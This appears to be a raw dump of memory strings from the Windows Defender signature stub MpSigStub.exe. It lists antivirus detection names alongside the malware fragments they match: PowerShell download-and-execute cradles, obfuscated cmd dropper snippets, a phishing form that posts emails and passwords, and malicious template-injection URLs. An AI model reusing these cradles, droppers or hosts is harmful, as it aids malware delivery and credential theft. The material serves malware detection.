Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *'^ha
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: >hs;v1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: j.r` i
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 'wnf/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ove7b
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: w.;ggq
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nnu[%u
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: kq?"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "](e`tz
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b@sc6
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: x}hs`\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &jk2f
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: oaiub
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,fn$|
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ba(p4
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [:hmw
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: }p[@&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: bd~o4
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: n?5n`
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s2!d2t
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $.ajax({url:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [$.ajax({url:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,type:"post",datatype:"html",data:{email:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,password:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,typeofemail:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#script:powershell/iexdownloadip
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [iex(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: new-objectnet.webclient).downloadstring(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#trojan:bat/cryptrepldow.ad2!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#trojan:win32/downloader.pk4!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !tart""%windir%\sys!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [!tart""%windir%\sys!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !em32\cm!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !p.exe/s"!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !"!%systemroot%\system32\ieframe.dll
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#trojan:win32/downloader.pk5!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !"!%systemroot%\system32\shell32.dll
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "!#scpt:trojan:html/phish.pyhj1!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: window.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: zwindow.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "!#script:pws:html/phish_paypalmsg1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: paypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: zpaypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "!#tel:scpt:trojan:win32/kovter!lnk
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: z\appdata\local\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .bat.\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: #!#script:html/techbrolo.g!alertfunc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: <scripttype="text/javascript">settimeout(function(){alert("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: y<scripttype="text/javascript">settimeout(function(){alert("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ")},2e3)</script>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $!#scpt:browsermodifier:win32/veenine
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: iexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xiexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z&from=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z&uid=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )&ts=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $!#scpt:o97m/cve-2017-11882.rxrop!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: >6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841*bhga{*
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: x>6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841*bhga{*
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $!#trojandownloader:vbs/powdown.d!ms1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: wtarget="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: %!#trojandownloader:o97m/silkie.c!pra3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: weregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: %!#trojandownloader:o97m/slikie.a3!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eexec("cmd/c@echooff&pi^n^g98-n3&echo|s^et/p=""
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: weexec("cmd/c@echooff&pi^n^g98-n3&echo|s^et/p=""
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: %!#trojandropper:bat/malvbsdrper.c!vc2
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: @echooff&(ifdefined@lo@goto
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: w@echooff&(ifdefined@lo@goto
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )&setlocaldisabledelayedexpansion&for/f"delims=:.tokens
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v<?xmlversion=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "target="http://185.172.110.217/kvsn/image.png"targetmode="external
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v<?xmlversion
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="http://outfish.bounceme.net/outl.dot"targetmode="external"/>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="http://theenterpriseholdings.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "targetmode="external"/>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#scpt:browsermodifier:win32/sweetpage
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: iexplore.exehttp://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: viexplore.exehttp://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#scpt:trojandownloader:vbs/qakbot.su1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: =replace("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v=replace("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ing","
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ","")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#scpt:worm:vbs/jenxcus!cryptrepchrrev
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v=replace(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,chrw(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: p,chrw(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9+)&chrw(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9+)
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (strreverse(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: p(strreverse(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ))execute
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#script:trojandownloader:vbs/totumu.a
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dimurl_jar,url_x86,url_amd64,url_jre,os,jar_path,jre_path,shellexecute,folder_parent
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: vdimurl_jar,url_x86,url_amd64,url_jre,os,jar_path,jre_path,shellexecute,folder_parent
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '!#scpt:trojandownloader:js/nemucod.orb3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 57708222a5d47044609256f51781760353e01731b204a0334164d50174b4e75147d79207132776d1873
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: u57708222a5d47044609256f51781760353e01731b204a0334164d50174b4e75147d79207132776d1873
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '!#scpt:trojandownloader:o97m/donoff.gb3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: exec("cmd.exe/c@echooff&ping2-n2&echo|s^et/p="".com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: uexec("cmd.exe/c@echooff&ping2-n2&echo|s^et/p="".com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .php"">>%appdata%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .ba^t")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '!#trojandownloader:o97m/slkinjec.ajk!a1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eexec("cmd.exe/cecho|set/p=""@echooff&wmicprocesscallcreate'msie"">%temp%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ueexec("cmd.exe/cecho|set/p=""@echooff&wmicprocesscallcreate'msie"">%temp%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#alf:exploit:o97m/cve-2017-11882.sm!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: c80d414a020000000b0000004551754154496f6e2e330000000000000000005a070000022b0e8502ff
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tc80d414a020000000b0000004551754154496f6e2e330000000000000000005a070000022b0e8502ff
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#scpt:exploit:o97m/cve-2011-1276.p!pra1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eexec("cmd.exe/c@echooff&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: teexec("cmd.exe/c@echooff&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &echo|s^et/p=""xec/ihttp^:^/^/^
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "">>%temp%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0.bat")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#scpt:exploit:o97m/cve-2017-11882.bxk37
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: {\rtf78669887566447301105695@cmfp8mjhxsngl6goe@-rs2us5vyqiyxvabs<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: t{\rtf78669887566447301105695@cmfp8mjhxsngl6goe@-rs2us5vyqiyxvabs<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#scpt:exploit:o97m/cve-2017-11882.bxk43
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: {\rtf67890078666405815526827@jmpkkg0lyqhcmsed@-bld1gsxsj40mgr8jq<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: t{\rtf67890078666405815526827@jmpkkg0lyqhcmsed@-bld1gsxsj40mgr8jq<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc"targetmode="external
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ttarget="http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc"targetmode="external
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: main"count="1"uniquecount="1"><si><t>c:\programdata\oiqaxidlsvg.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tmain"count="1"uniquecount="1"><si><t>c:\programdata\oiqaxidlsvg.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: main"count="1"uniquecount="1"><si><t>c:\programdata\ousojvcmueo.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tmain"count="1"uniquecount="1"><si><t>c:\programdata\ousojvcmueo.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )!#scpt:js/obfuscator.hex.array.symbolic.a
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ":(1,"\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s":(1,"\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9a-f"),"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ":(1,"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ':'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s':'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9a-f','
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z':'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ':(1,'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s':(1,'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9a-f'),'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z':(1,'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *!#alf:exploit:o97m/cve-2017-11882.rqrt!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: yfqv7swlfwvoymhfr3ii6leqo0kakjygfaj6vjdnsulrkeq1uqdq9iyrc4ewxmem8jss4zircnlshosn
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ryfqv7swlfwvoymhfr3ii6leqo0kakjygfaj6vjdnsulrkeq1uqdq9iyrc4ewxmem8jss4zircnlshosn
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *!#scpt:exploit:o97m/cve-2017-11882.pdc!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: {\rtf3409\page885999@39368814739715259352834232805474&hnnn=:_>>k2f_~,=jh*fm&&9o-
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: r{\rtf3409\page885999@39368814739715259352834232805474&hnnn=:_>>k2f_~,=jh*fm&&9o-
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *!#scpt:trojandownloader:vbs/powdow.zx2!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 76%07%a6%e2%47%37%f6%86%f2%f6%36%e2%c6%f6%36%47%56%e6%96%37%f2%f2%a3%07%47%47%86
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: r76%07%a6%e2%47%37%f6%86%f2%f6%36%e2%c6%f6%36%47%56%e6%96%37%f2%f2%a3%07%47%47%86
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *!#scpt:trojandownloader:vbs/tnega.vae2!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ("wscript.shell")f4444444444444.run("powershell$
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: r("wscript.shell")f4444444444444.run("powershell$
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ='http://transfer.sh/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .txt'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: +!#scpt:exploit:o97m/cve-2017-0199.dddd8!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: usa-national.info/gpu/dazed/senses.dot'targetmode="external"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: qusa-national.info/gpu/dazed/senses.dot'targetmode="external"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target='http://
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ktarget='http://
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: +!#scpt:trojandownloader:powershell/tnega.pb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: kthreaddi,sysrv,sysrv012,sysrv011,sysrv010,sysrv00*-erroractionsilentlycontinue
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: qkthreaddi,sysrv,sysrv012,sysrv011,sysrv010,sysrv00*-erroractionsilentlycontinue
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: +!#script:virtool:win32/autinject.bp!replace
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: run($a)func_x($string,$deli,$rep)returnstringreplace($string,$deli,$rep)endfunc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: qrun($a)func_x($string,$deli,$rep)returnstringreplace($string,$deli,$rep)endfunc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,!#scpt:trojandownloader:o97m/encdoc.sma2!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: saohaoeaolaolao3ao2aosaohaoeaolaolaoeaoxaoeaocaouaotaoeaoaaojaojaocaocaocaocao
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: psaohaoeaolaolao3ao2aosaohaoeaolaolaoeaoxaoeaocaouaotaoeaoaaojaojaocaocaocaocao
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,!#scpt:trojandownloader:vbs/donvibs.prc3!mtb
